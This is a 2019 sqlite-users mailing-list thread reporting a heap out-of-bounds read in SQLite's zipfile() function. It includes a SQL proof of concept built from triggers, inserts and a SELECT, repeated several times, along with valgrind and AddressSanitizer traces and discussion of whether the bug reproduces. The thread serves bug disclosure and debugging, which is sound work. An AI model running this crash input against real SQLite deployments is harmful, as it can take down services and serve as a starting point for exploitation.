Re: [sqlite] Heap Out of Bound Read in Sqlite
Yongheng Chen wrote: > This seems a problem of gcc(Ubuntu 5.5.0-12ubuntu5~16.04). When > I use this specific version to compile sqlite, the problem can be repro. Unlikely to be a compiler issue. I can reproduce the bug with valgrind with SQLite shell built with: * gcc (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0 * or clang-6.0.0-1ubuntu2 Dominique ___ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
Re: [sqlite] Heap Out of Bound Read in Sqlite
On Tue, Dec 24, 2019 at 5:48 PM Richard Hipp wrote:
>
> On 12/24/19, Yongheng Chen wrote:
> >
> > When we run it with sqlite compiled with asan, we got a heap overflow crash.
> >
> > The bug exists in the latest development code.
>
> Unable to repro. Tried tip of trunk and release, using gcc and clang,
> all with various combinations of -fsanitize=memory,
> -fsanitize=address, -fsanitize=undefined, and running under valgrind.
Hi
I just tried the latest from trunk in fossil
(1c0a05b09 2019-12-24 16:20:05 UTC) and I can
reproduce the bug when running with valgrind:
$ valgrind ./sqlite3
==6674== Memcheck, a memory error detector
==6674== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==6674== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info
==6674== Command: ./sqlite3
==6674==
SQLite version 3.31.0 2019-12-24 16:20:05
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
sqlite> CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
sqlite> CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 )
VALUES ( 10.1 ) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO
NOTHING ; END ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE
'1' ) FROM v0 ;
==6674== Invalid read of size 1
==6674==at 0x12944E: zipfileStep (shell.c:6243)
==6674==by 0x1B8711: sqlite3VdbeExec (sqlite3.c:91052)
==6674==by 0x1BD58F: sqlite3Step (sqlite3.c:82703)
==6674==by 0x1BD58F: sqlite3_step (sqlite3.c:82768)
==6674==by 0x13161D: exec_prepared_stmt (shell.c:11379)
==6674==by 0x13161D: shell_exec (shell.c:11684)
==6674==by 0x132C7B: runOneSqlLine (shell.c:18265)
==6674==by 0x13CCE4: process_input (shell.c:18365)
==6674==by 0x11DD65: main (shell.c:19123)
==6674== Address 0x5d15ccf is 1 bytes before a block of size 120,000 alloc'd
==6674==at 0x4C2FB0F: malloc (in
/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==6674==by 0x16AAF0: sqlite3MemMalloc (sqlite3.c:23180)
==6674==by 0x1459E1: mallocWithAlarm (sqlite3.c:27071)
==6674==by 0x1459E1: sqlite3Malloc (sqlite3.c:27101)
==6674==by 0x1516A4: setupLookaside (sqlite3.c:158620)
==6674==by 0x1E463D: openDatabase (sqlite3.c:161240)
==6674==by 0x1327FF: open_db.part.64 (shell.c:12696)
==6674==by 0x132EA6: open_db (stdio2.h:97)
==6674==by 0x132EA6: runOneSqlLine (shell.c:18261)
==6674==by 0x13CCE4: process_input (shell.c:18365)
==6674==by 0x11DD65: main (shell.c:19123)
==6674==
0|NULL
sqlite>
Line where overflow is detected in shell.c:6243:
6242 }else{
!6243 if( zName[nName-1]!='/' ){
6244 zName = zFree = sqlite3_mprintf("%s/", zName);
Regards
Dominique
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
Re: [sqlite] Heap Out of Bound Read in Sqlite
This seems a problem of gcc(Ubuntu 5.5.0-12ubuntu5~16.04). When I use this
specific version to compile sqlite, the problem can be repro.
Just in case you need it, here’s the log I got:
—
SQLite version 3.31.0 2019-12-24 15:35:53
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
sqlite> CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
sqlite> CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1
) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' )
FROM v0 ;
=
==25839==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x634007ff at pc 0x0042c622 bp 0x7ffe62feaf20 sp 0x7ffe62feaf10
READ of size 1 at 0x634007ff thread T0
#0 0x42c621 in zipfileStep /data/xxx/sqlite/asan/shell.c:6243
#1 0x5a30f6 in sqlite3VdbeExec /data/xxx/sqlite/asan/sqlite3.c:91052
#2 0x5c155e in sqlite3Step /data/xxx/sqlite/asan/sqlite3.c:82703
#3 0x5c155e in sqlite3_step /data/xxx/sqlite/asan/sqlite3.c:82768
#4 0x436e0d in exec_prepared_stmt /data/xxx/sqlite/asan/shell.c:11379
#5 0x43da53 in shell_exec /data/xxx/sqlite/asan/shell.c:11684
#6 0x440631 in runOneSqlLine /data/xxx/sqlite/asan/shell.c:18265
#7 0x450f95 in process_input /data/xxx/sqlite/asan/shell.c:18365
#8 0x412a65 in main /data/xxx/sqlite/asan/shell.c:19123
#9 0x7fc3b2a9d82f in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#10 0x413e18 in _start (/data/xxx/sqlite/asan/sqlite3+0x413e18)
0x634007ff is located 1 bytes to the left of 12-byte region
[0x63400800,0x6341dcc0)
allocated by thread T0 here:
#0 0x7fc3b3754662 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98662)
#1 0x4d2ea0 in sqlite3MemMalloc /data/xxx/sqlite/asan/sqlite3.c:23180
—
Yongheng Chen
> On Dec 24, 2019, at 11:48 AM, Richard Hipp wrote:
>
> On 12/24/19, Yongheng Chen wrote:
>>
>> When we run it with sqlite compiled with asan, we got a heap overflow crash.
>>
>> The bug exists in the latest development code.
>
> Unable to repro. Tried tip of trunk and release, using gcc and clang,
> all with various combinations of -fsanitize=memory,
> -fsanitize=address, -fsanitize=undefined, and running under valgrind.
>
>
> --
> D. Richard Hipp
> d...@sqlite.org
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
Re: [sqlite] Heap Out of Bound Read in Sqlite
On 12/24/19, Yongheng Chen wrote: > > When we run it with sqlite compiled with asan, we got a heap overflow crash. > > The bug exists in the latest development code. Unable to repro. Tried tip of trunk and release, using gcc and clang, all with various combinations of -fsanitize=memory, -fsanitize=address, -fsanitize=undefined, and running under valgrind. -- D. Richard Hipp d...@sqlite.org ___ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
[sqlite] Heap Out of Bound Read in Sqlite
Hi,
We found a oob read in sqlite. Here’s the PoC:
—
CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 ) ,( ''
) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) FROM v0 ;
—
When we run it with sqlite compiled with asan, we got a heap overflow crash.
The bug exists in the latest development code.
Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
